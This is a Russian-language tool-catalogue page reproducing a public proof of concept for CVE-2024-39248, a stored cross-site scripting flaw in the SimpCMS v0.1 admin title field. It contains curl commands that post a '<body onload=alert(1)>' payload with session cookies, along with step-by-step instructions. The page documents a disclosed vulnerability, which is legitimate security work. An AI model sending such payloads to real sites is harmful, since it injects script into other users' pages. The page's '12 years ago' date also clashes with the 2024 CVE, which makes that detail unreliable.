Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-39248 — Публикация для Cross Site Scripting (XSS) в SimpCMS v0.1 - /SimpCMS/admin.php | Kitploit
Инструменты/GitHubGitHub/jasonthename/cve-2024-39248
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubjasonthename/cve-2024-39248

CVE-2024-39248

Публикация для Cross Site Scripting (XSS) в SimpCMS v0.1 - /SimpCMS/admin.php

Репозиторий
12 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Название эксплойта: SimpCMS v0.1 - Межсайтовый скриптинг (XSS)

CVE: CVE-2024-39248

Автор эксплойта: Jason Jacobs (0xjason_jacobs - Twitter)

Домашняя страница вендора: https://sourceforge.net/projects/simpcms/

Уязвимая конечная точка: /SimpCMS/admin.php

Уязвимость межсайтового скриптинга (XSS) в SimpCMS v0.1 позволяет злоумышленникам выполнять произвольные веб-сценарии или HTML через специально созданную полезную нагрузку, внедрённую в поле Title на /admin.php.

Обновлённые параметры команды cURL для версии SimpCMS, размещённой на SourceForge:

После входа в интерфейс администратора SimpCMS скопируйте соответствующие значения Cookie, наблюдаемые на вкладке Application в инструментах разработчика браузера, и отправьте следующий запрос curl:

curl -X POST "http://site.com/SimpCMS/admin/index.php" -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0"

command

poc

Параметры из первоначального отчёта CVE (тот же эксплойт работает):

Изначальные параметры, наблюдаемые для программного обеспечения SimpCMS, привели к следующей команде cURL, но позже были обновлены:

curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"

Пояснение:

  • curl: Инструмент командной строки для передачи данных по URL-адресам.
  • -X POST: Указывает используемый метод запроса (POST).
  • "http://site.com/SimpCMS/admin.php": URL-адрес, на который отправляется запрос.
  • -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0" - Полезная нагрузка POST-запроса.

Запустите эту команду в терминале, чтобы отправить POST-запрос с XSS-полезной нагрузкой. Посетите основной сайт /SimpCMS, и XSS станет видимым.

CWE: https://cwe.mitre.org/data/definitions/79.html

Скачать инструмент